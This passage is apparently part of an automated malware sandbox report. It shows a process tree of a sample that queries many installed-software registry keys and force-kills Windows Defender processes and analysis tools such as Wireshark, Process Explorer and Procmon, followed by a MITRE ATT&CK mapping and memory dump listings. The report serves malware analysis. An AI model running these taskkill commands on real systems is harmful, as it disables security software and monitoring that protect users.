    3⤵
    PID:3408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:3528
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4556
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:2808
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4232
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4560
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4628
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4732
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4048
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:5028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4704
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:5008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4112
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:4148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:3528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:2240
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1620
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2724
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4452
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:3904
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4788
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4628
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4992
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:2376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4128
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:3892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4736
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:2808
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4324
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4816
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4628
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4664
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:1252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:1880
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:3956
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:3856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4544
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:1240
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:3892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4332
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:792
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5008
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3896
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1192
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4332

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3988-105-0x0000021C1FC20000-0x0000021C1FC21000-memory.dmp

Filesize
4KB

Download
memory/3988-118-0x0000021C20770000-0x0000021C20771000-memory.dmp

Filesize
4KB

Download
memory/3988-83-0x00007FFC62E70000-0x00007FFC6385C000-memory.dmp

Filesize
9.9MB

Download